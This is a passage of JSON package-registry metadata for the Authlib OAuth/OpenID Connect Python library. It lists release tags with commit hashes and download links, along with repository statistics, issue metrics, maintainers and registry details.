s"},{"name":"v0.14.3","sha":"ffdc4378a2b0c8e6627170396384d1bfcfb7ed40","kind":"commit","published_at":"2020-05-18T13:54:54.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.3/manifests"},{"name":"v0.14.2","sha":"ce8b46b9e64ab799587b0a577cf122c1523c69a6","kind":"commit","published_at":"2020-05-06T00:54:33.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.2/manifests"},{"name":"v0.14.1","sha":"8e8786bd2b0308d82438ef8a9424765a1777bfce","kind":"commit","published_at":"2020-02-12T04:39:08.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.1/manifests"},{"name":"v0.14","sha":"25e7fe4803af94b4b4057920a854fb6d0994ac78","kind":"commit","published_at":"2020-02-11T14:11:42.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14/manifests"},{"name":"v0.13","sha":"442da0bfd11673ab5049ed8c8b53341c35b4aaca","kind":"commit","published_at":"2019-11-11T11:32:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.13","html_url":"https://github.com/authlib/authlib/releases/tag/v0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.13/manifests"},{"name":"v0.12.1","sha":"1475dedabe610be442f89027c24b6de09a0c6610","kind":"commit","published_at":"2019-09-12T08:26:58.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.12.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12.1/manifests"},{"name":"v0.12","sha":"19395bdfc99bba69acce4ff7ff726df7ed794813","kind":"commit","published_at":"2019-09-03T12:11:13.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.12","html_url":"https://github.com/authlib/authlib/releases/tag/v0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12/manifests"},{"name":"v0.11","sha":"5403f90a0a910b1519622a2b97e03f0b9cce36e4","kind":"commit","published_at":"2019-04-06T05:00:23.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.11","html_url":"https://github.com/authlib/authlib/releases/tag/v0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.11/manifests"},{"name":"v0.10","sha":"19bc7cabe8f5bd8a4503cf8681d75c36fed419b8","kind":"commit","published_at":"2018-10-12T02:22:42.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.10","html_url":"https://github.com/authlib/authlib/releases/tag/v0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.10/manifests"},{"name":"v0.9","sha":"abf4555fa6b0d8cf64c31b2c4c90fb5d875c2de8","kind":"commit","published_at":"2018-08-12T04:38:51.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.9","html_url":"https://github.com/authlib/authlib/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.9/manifests"},{"name":"v0.8","sha":"a0226e08943aab25b423f2e7d9bc9a903faeb459","kind":"commit","published_at":"2018-06-17T04:49:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.8","html_url":"https://github.com/authlib/authlib/releases/tag/v0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.8/manifests"},{"name":"v0.7","sha":"aea225d3a2556a36025dc48742470317cee8e728","kind":"commit","published_at":"2018-04-28T07:14:47.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.7","html_url":"https://github.com/authlib/authlib/releases/tag/v0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.7/manifests"},{"name":"v0.6","sha":"0008acb2985087adae5855812ff5559a1ea0dd9a","kind":"commit","published_at":"2018-03-20T12:36:34.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.6","html_url":"https://github.com/authlib/authlib/releases/tag/v0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.6/manifests"},{"name":"v0.5.1","sha":"4fd0929fba4a91b304ee16f1a870fa7064e0af8e","kind":"commit","published_at":"2018-02-11T13:09:41.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.5.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5.1/manifests"},{"name":"v0.5","sha":"96f7186da5d7eb0d561153277b93af0c7386dab7","kind":"commit","published_at":"2018-02-11T12:19:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.5","html_url":"https://github.com/authlib/authlib/releases/tag/v0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5/manifests"},{"name":"v0.4.1","sha":"6f2970849fa2044740b66610508d8607f352e84b","kind":"commit","published_at":"2018-02-01T15:26:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.4.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4.1/manifests"},{"name":"v0.4","sha":"8014315fcba3f635256119573a8f237befc4405a","kind":"commit","published_at":"2018-01-31T12:49:09.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.4","html_url":"https://github.com/authlib/authlib/releases/tag/v0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4/manifests"},{"name":"v0.3","sha":"06f609cbbfcbb0cba3476015ec472d86ee84f894","kind":"commit","published_at":"2017-12-24T12:38:11.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.3/manifests"},{"name":"v0.2.1","sha":"117e88d7c02be5f5abbc91785fb0250366544956","kind":"commit","published_at":"2017-12-06T02:03:27.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.2.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2.1/manifests"},{"name":"v0.2","sha":"3ec75529da09dc2d238b84b9509da737c5ca241b","kind":"commit","published_at":"2017-11-25T12:33:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2/manifests"},{"name":"v0.1","sha":"baa74c624710f05ed26b651e552cbf8f8d02f0c2","kind":"commit","published_at":"2017-11-18T06:36:32.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2026-06-08T23:04:00.646Z","dependent_packages_count":4,"downloads":6996,"downloads_period":"total","dependent_repos_count":8,"rankings":{"downloads":null,"dependent_repos_count":39.56508607671398,"dependent_packages_count":11.114466928420416,"stargazers_count":13.772274237390517,"forks_count":17.63817577771066,"docker_downloads_count":null,"average":20.522500755058893},"purl":"pkg:conda/authlib","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/authlib","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/authlib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/authlib/dependencies","status":null,"funding_links":["https://github.com/sponsors/authlib","https://github.com/sponsors/lepture"],"critical":null,"issue_metadata":{"last_synced_at":"2026-06-05T22:11:40.072Z","issues_count":57,"pull_requests_count":82,"avg_time_to_close_issue":30997660.782608695,"avg_time_to_close_pull_request":1533216.530612245,"issues_closed_count":23,"pull_requests_closed_count":49,"pull_request_authors_count":28,"issue_authors_count":43,"avg_comments_per_issue":1.7894736842105263,"avg_comments_per_pull_request":0.8048780487804879,"merged_pull_requests_count":46,"bot_issues_count":0,"bot_pull_requests_count":1,"past_year_issues_count":36,"past_year_pull_requests_count":59,"past_year_avg_time_to_close_issue":1361940.1538461538,"past_year_avg_time_to_close_pull_request":666197.59375,"past_year_issues_closed_count":13,"past_year_pull_requests_closed_count":32,"past_year_pull_request_authors_count":19,"past_year_issue_authors_count":27,"past_year_avg_comments_per_issue":1.25,"past_year_avg_comments_per_pull_request":0.8813559322033898,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":31,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/issues","maintainers":[{"login":"azmeuk","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"},{"login":"lepture","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}],"active_maintainers":[{"login":"azmeuk","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"},{"login":"lepture","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/authlib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/authlib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/authlib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/authlib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/authlib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/authlib/codemeta","maintainers":[],"registry":{"name":"anaconda.org","url":"https://anaconda.org","ecosystem":"conda","default":true,"packages_count":5169,"maintainers_count":0,"namespaces_count":0,"keywords_count":3232,"github":"Anaconda","metadata":{"kind":"anaconda","key":"Main","api":"https://repo.ananconda.com","funded_packages_count":759},"icon_url":"https://github.com/Anaconda.png","created_at":"2022-10-03T15:37:08.736Z","updated_at":"2026-06-10T05:18:41.108Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/namespaces"}},{"id":11647151,"name":"github.com/authlib/authlib","ecosystem":"go","description":null,"homepage":null,"licenses":"bsd-3-clause","normalized_licenses":["BSD-3-Clause"],"repository_url":"https://github.com/authlib/authlib","keywords_array":[],"namespace":null,"versions_count":42,"first_release_published_at":"2017-12-06T02:03:27.000Z","latest_release_published_at":"2026-05-06T08:08:51.000Z","latest_release_number":"v1.7.2","last_synced_at":"2026-06-13T00:02:26.340Z","created_at":"2025-05-16T10:36:35.946Z","updated_at":"2026-06-13T00:02:26.340Z","registry_url":"https://pkg.go.dev/github.com/authlib/authlib","install_command":"go get github.com/authlib/authlib","documentation_url":"https://pkg.go.dev/github.com/authlib/authlib#section-documentation","metadata":{},"repo_metadata":{"id":37896804,"uuid":"108510280","full_name":"authlib/authlib","owner":"authlib","description":"The ultimate Python library in building OAuth, OpenID Connect clients and servers. JWS, JWE, JWK, JWA, JWT included.","archived":false,"fork":false,"pushed_at":"2025-11-27T11:50:06.000Z","size":3615,"stargazers_count":5116,"open_issues_count":131,"forks_count":517,"subscribers_count":57,"default_branch":"main","last_synced_at":"2025-11-28T18:59:47.663Z","etag":null,"topics":["django","flask","jose","jwe","jwk","jws","jwt","oauth","oauth2","oauth2-provider","oauth2-server","oidc","openid-connect"],"latest_commit_sha":null,"homepage":"https://authlib.org/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/authlib.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["authlib","lepture"]}},"created_at":"2017-10-27T06:52:26.000Z","updated_at":"2025-11-27T14:14:00.000Z","dependencies_parsed_at":"2024-02-28T02:49:54.296Z","dependency_job_id":"f5f7241b-5c04-4a8f-87ff-1eb0a732e011","html_url":"https://github.com/authlib/authlib","commit_stats":{"total_commits":1301,"total_committers":125,"mean_commits":10.408,"dds":"0.14604150653343584","last_synced_commit":"fe12a578854fb64c8a3906676ba7d2a2b9579459"},"previous_names":["authlib/authlib"],"tags_count":47,"template":false,"template_full_name":null,"purl":"pkg:github/authlib/authlib","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":27340058,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-11-29T02:00:06.589Z","response_time":56,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"authlib","name":"Authlib","uuid":"32964472","kind":"organization","description":"The ultimate Python library in building OAuth and OpenID Connect servers.","email":null,"website":"https://authlib.org/","location":"Japan","twitter":"authlib","company":null,"icon_url":"https://avatars.githubusercontent.com/u/32964472?v=4","repositories_count":11,"last_synced_at":"2025-10-14T16:26:06.852Z","metadata":{"has_sponsors_listing":true,"funding":{"github":["authlib","lepture"]}},"html_url":"https://github.com/authlib","funding_links":["https://github.com/sponsors/authlib","https://github.com/sponsors/lepture"],"total_stars":6702,"followers":67,"following":0,"created_at":"2022-11-06T14:13:52.360Z","updated_at":"2025-10-14T16:26:06.852Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib/repositories"},"tags":[{"name":"v1.6.5","sha":"9ec42561cd1a81b518598d252f8adbcf446f7419","kind":"commit","published_at":"2025-10-02T13:31:28.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.5","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.5/manifests"},{"name":"v1.6.4","sha":"09a51855747c13771a74958e233a6bf1fd143741","kind":"commit","published_at":"2025-09-17T09:58:16.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.4","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.4/manifests"},{"name":"v1.6.3","sha":"dbbfa9abcfe725001b452cf08d9e48be0ebfdce9","kind":"tag","published_at":"2025-08-26T12:04:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.3","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.3/manifests"},{"name":"v1.6.2","sha":"3385fbf804f0c32ccfadf21611cf893aabc1b0c0","kind":"tag","published_at":"2025-08-23T08:28:25.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.2/manifests"},{"name":"v1.6.1","sha":"ef3d5733198570b8cff7a0b4f41988cfe9cf2b69","kind":"commit","published_at":"2025-07-20T07:37:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.1/manifests"},{"name":"v1.6.0","sha":"fe87a117f941975793bf4063e9b08b90e88b230a","kind":"tag","published_at":"2025-05-22T12:58:35.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.0/manifests"},{"name":"v1.5.2","sha":"fb698d796e4b39fd1bbfd008181bfa8cea33c67b","kind":"tag","published_at":"2025-04-02T10:30:34.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"4eafdc21891e78361f478479efe109ff0fb2f661","kind":"tag","published_at":"2025-02-28T14:43:15.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"2d0396e3fc49d53ab816bb43ec83fe42d527ca09","kind":"tag","published_at":"2025-02-25T09:53:21.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"0e8f480e9c9a91ab3dc8017de70f59014e66664d","kind":"commit","published_at":"2025-01-28T13:04:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.4.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"eb34edfc8b1fdaae51a91d4686ebb34395e5082c","kind":"commit","published_at":"2024-12-20T07:26:03.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.4.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.0/manifests"},{"name":"v1.3.2","sha":"d7db2c33226983648b91e3ec0d9cf2e43dc480d4","kind":"commit","published_at":"2024-08-24T05:08:50.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.2/manifests"},{"name":"v1.3.1","sha":"df226ab587c453029ef5083a7e1c5dc6772647dd","kind":"commit","published_at":"2024-06-04T02:38:10.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.1/manifests"},{"name":"v1.3.0","sha":"a7d68b4c3b8a3a7fe0b62943b5228669f2f3dfec","kind":"commit","published_at":"2023-12-17T07:55:15.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.0","tag_url":"https://repos.ecosyste.ms/a